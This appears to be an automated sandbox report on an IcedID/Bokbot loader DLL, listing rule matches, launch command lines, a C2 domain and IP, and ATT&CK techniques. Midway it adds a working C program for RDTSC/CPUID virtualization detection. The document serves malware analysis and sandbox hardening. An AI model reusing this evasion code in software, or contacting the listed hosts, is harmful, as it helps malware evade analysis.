Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_00000001800024FC
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800024FC
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00000001800024FC
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00000001800024FC
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_00007FFC65B1542B NtMapViewOfSection,NtCreateSection,
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FFC66B0542B NtMapViewOfSection,NtCreateSection,
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree,
Source: J5V5DR.dll | Virustotal: Detection: 13%
Source: J5V5DR.dll | ReversingLabs: Detection: 12%
Source: J5V5DR.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\J5V5DR.dll"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,HdQZgnE
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\J5V5DR.dll,IfkPmdu
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: classification engine | Classification label: mal100.troj.evad.winDLL@13/0@4/1
Source: C:\Windows\System32\loaddll64.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll64.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: J5V5DR.dll | Static PE information: Image base 0x180000000 > 0x60000000
Source: J5V5DR.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: J5V5DR.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_00007FFC65B1251D push rax; ret
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00007FFC66B0251D push rax; ret
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\J5V5DR.dll
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe | RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\rundll32.exe | RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\loaddll64.exe | RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\loaddll64.exe | RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Note on reading the six listings above: the interceptor decoded this 64-bit code as 32-bit, so every REX prefix byte (0x48, 0x4C) shows up as a bogus "dec eax" or "dec esp". Read in 64-bit mode, "dec eax / shl edx, 20h / dec eax / or eax, edx / dec esp / mov eax, eax" is "shl rdx, 32 / or rax, rdx / mov r8, rax" (combine the EDX:EAX halves returned by RDTSC into one 64-bit timestamp and save it before CPUID clobbers rax), and "dec eax / mov ecx, eax" is "mov rcx, rax". The routine therefore reads the time-stamp counter, executes CPUID leaf 1 (an instruction every hypervisor must intercept), reads the counter again and works with the elapsed cycle count; this is the code behind the report's "Tries to detect virtualization through RDTSC time measurements" and "Contains functionality to detect hardware virtualization (CPUID execution measurement)" signatures. The stack slots at [rsp+20h..2Ch] hold the four CPUID result registers, which the loader can also inspect for the hypervisor-present bit.
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_0000000180002AC0 SwitchToThread,SwitchToThread,
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180002AC0 SwitchToThread,SwitchToThread,
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000000180002AC0 SwitchToThread,SwitchToThread,
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000000180002AC0 SwitchToThread,SwitchToThread,
Source: C:\Windows\System32\loaddll64.exe TID: 5132 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6940 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\loaddll64.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\regsvr32.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\rundll32.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\rundll32.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_0000000180002174 rdtsc
Source: C:\Windows\System32\loaddll64.exe | Process information queried: ProcessInformation
Source: rundll32.exe, 00000003.00000002.279011932.000001D397AA0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWPK
Source: rundll32.exe, 00000004.00000002.279392364.000001EDE5D2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%
Source: loaddll64.exe, 00000000.00000002.306438498.00000239D2D35000.00000004.00000020.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.306399602.00000239D2CF0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278392013.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279042528.000001D397AD3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279392364.000001EDE5D2A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.279346138.000001EDE5CF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: loaddll64.exe, 00000000.00000002.306426714.00000239D2D1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWB4
Source: regsvr32.exe, 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.279042528.000001D397AD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_0000000180002174 rdtsc
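The two virtualization-detection signatures in this section rest on one measurement: read the time-stamp counter, execute CPUID, read it again. The C program below is an added example written for this page; it is not code from the Joe Sandbox report and not code recovered from the IcedID sample. It reproduces that measurement with inline assembly and adds what the intercepted listing does not show, the step that turns a set of cycle deltas into a verdict. The 1000-cycle threshold, the sample count of 16 and the two embedded sample arrays are assumptions and constructed data, not values taken from the sample. A defender can run it inside a sandbox to see how far the CPUID cost sits from bare metal, which is the gap a loader like this one keys on.

```c
/* Added example for this page: RDTSC/CPUID timing check of the kind the
 * report flags, plus a classifier around it.  Not code from the report or
 * from the analysed sample.  Threshold, sample count and the embedded
 * sample arrays are assumptions / constructed data. */
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

/* Read the 64-bit time-stamp counter.  RDTSC returns it split across
 * EDX:EAX; joining the halves is the "shl rdx, 32 / or rax, rdx" pair in
 * the intercepted listing.  Returns 0 when not built for x86-64. */
static uint64_t read_tsc(void)
{
#if defined(__x86_64__)
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
#else
    return 0;
#endif
}

/* CPUID leaf 1 (xor ecx,ecx / mov eax,1 / cpuid).  CPUID unconditionally
 * exits to the hypervisor, which is what makes it a usable timing probe. */
static void cpuid_leaf1(void)
{
#if defined(__x86_64__)
    uint32_t a, b, c, d;
    __asm__ __volatile__("cpuid"
                         : "=a"(a), "=b"(b), "=c"(c), "=d"(d)
                         : "a"(1), "c"(0));
    (void)a; (void)b; (void)c; (void)d;
#endif
}

/* One measurement: the rdtsc / cpuid / rdtsc triple from the listing. */
uint64_t cpuid_rdtsc_delta(void)
{
    uint64_t t0 = read_tsc();
    cpuid_leaf1();
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

static int cmp_u64(const void *p, const void *q)
{
    uint64_t a = *(const uint64_t *)p, b = *(const uint64_t *)q;
    return (a > b) - (a < b);
}

/* Median of n deltas.  Median rather than mean or a single reading, so one
 * interrupt or context switch during a measurement cannot flip the verdict.
 * Returns 0 for n == 0 or on allocation failure. */
uint64_t median_u64(const uint64_t *v, size_t n)
{
    if (n == 0) return 0;
    uint64_t *copy = malloc(n * sizeof *copy);
    if (copy == NULL) return 0;
    for (size_t i = 0; i < n; i++) copy[i] = v[i];
    qsort(copy, n, sizeof *copy, cmp_u64);
    uint64_t m = (n % 2) ? copy[n / 2] : (copy[n / 2 - 1] + copy[n / 2]) / 2;
    free(copy);
    return m;
}

/* 1 if the median delta exceeds the threshold (CPUID slow enough to look
 * like a VM exit), 0 otherwise, including for an empty sample set. */
int looks_virtualized(const uint64_t *deltas, size_t n, uint64_t threshold)
{
    if (n == 0) return 0;
    return median_u64(deltas, n) > threshold ? 1 : 0;
}

/* Assumed threshold: bare-metal CPUID costs on the order of a hundred to a
 * few hundred cycles, a VM exit typically thousands.  Illustrative only. */
#define VM_THRESHOLD_CYCLES 1000ULL
#define PROBE_SAMPLES 16

/* Probe the machine this program is running on. */
int probe_this_machine(void)
{
    uint64_t d[PROBE_SAMPLES];
    for (size_t i = 0; i < PROBE_SAMPLES; i++) d[i] = cpuid_rdtsc_delta();
    return looks_virtualized(d, PROBE_SAMPLES, VM_THRESHOLD_CYCLES);
}

/* Constructed sample sets (not measurements from the report): a bare-metal
 * looking run with one slow outlier, and a hypervisor-looking run with one
 * fast outlier.  The median ignores the outlier in both cases. */
const uint64_t SAMPLE_BARE_METAL[5] = {120, 130, 125, 9000, 118};
const uint64_t SAMPLE_HYPERVISOR[5] = {2400, 2600, 50, 2500, 2550};

int main(void)
{
    printf("constructed bare-metal set -> %d, constructed hypervisor set -> %d\n",
           looks_virtualized(SAMPLE_BARE_METAL, 5, VM_THRESHOLD_CYCLES),
           looks_virtualized(SAMPLE_HYPERVISOR, 5, VM_THRESHOLD_CYCLES));
    printf("this machine: %s\n",
           probe_this_machine() ? "looks virtualized" : "looks bare metal");
    return 0;
}
```

Build with `gcc -O2 -o tsccheck tsccheck.c` on x86-64 (the asm is GCC/Clang syntax); on any other architecture the probes return 0 and only the constructed sets are classified. Two practical notes for anyone hardening a sandbox against this check: the hypervisor can raise the threshold the malware would need by making the TSC read itself trap (TSC offsetting or `rdtsc` exiting), and a single outlier in either direction does not change the verdict here, which is why a loader that samples several times is harder to fool with one slow or fast measurement than a single-shot check.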

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe | Domain query: ilekvoyn.com
Source: C:\Windows\System32\rundll32.exe | Network Connect: 64.227.182.2 80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\J5V5DR.dll",#1
Source: rundll32.exe, 00000003.00000002.278654277.000000BC44AEC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: User32advapi32@Shell_TrayWndcK
Source: loaddll64.exe, 00000000.00000002.306193512.000000AFC938C000.00000004.00000010.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.278077468.00000000006FB000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000004.00000002.278897415.0000007244FCC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: User32advapi32@Shell_TrayWnd
Source: C:\Windows\System32\loaddll64.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll64.exe | Code function: 0_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW,

              Stealing of Sensitive Information

Source: Yara match | File source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
Source: Yara match | File source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE

              Remote Access Functionality

Source: Yara match | File source: 0.2.loaddll64.exe.239d1412178.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll64.exe.239d139d591.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1ede3fcb648.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.1ede3f59841.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.b99811.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1d395c5b848.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.regsvr32.exe.c091b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1d395be9aa1.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.278351731.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.278941809.000001D395CB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.279021082.000001D397AAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.278763350.000001D395BDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.306270173.00000239D1393000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.278123600.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.278950571.000001EDE3F48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll64.exe PID: 6832, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6860, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6868, type: MEMORYSTR
Source: Yara match | File source: 2.2.regsvr32.exe.180000000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.180000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll64.exe.180000000.0.unpack, type: UNPACKEDPE
MITRE ATT&CK Matrix

Techniques are listed per tactic column. A number in square brackets after a technique is the count badge the original matrix prints next to techniques matched by this sample, reproduced exactly as printed; techniques without a number are the unmatched cells of the matrix.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Native API [1], Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
Persistence: DLL Side-Loading [1], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection [112], DLL Side-Loading [1], Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Defense Evasion: Virtualization/Sandbox Evasion [1], Process Injection [112], Obfuscated Files or Information [1], Regsvr32 [1], Rundll32 [1], DLL Side-Loading [1], Compile After Delivery, Indicator Removal from Tools
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Security Software Discovery [221], Virtualization/Sandbox Evasion [1], Process Discovery [2], Account Discovery [1], System Owner/User Discovery [1], Remote System Discovery [1], System Network Configuration Discovery [1], System Information Discovery [22]
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
Collection: Archive Collected Data [1], Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1], Ingress Tool Transfer [3], Non-Application Layer Protocol [3], Application Layer Protocol [13], Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue
Behavior Graph (ID: 632638, Sample: J5V5DR.dll, Start date: 23/05/2022, Architecture: WINDOWS, Score: 100)
Start node signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 2 other signatures
• loaddll64.exe, started from the start node
  DNS/IP: ilekvoyn.com
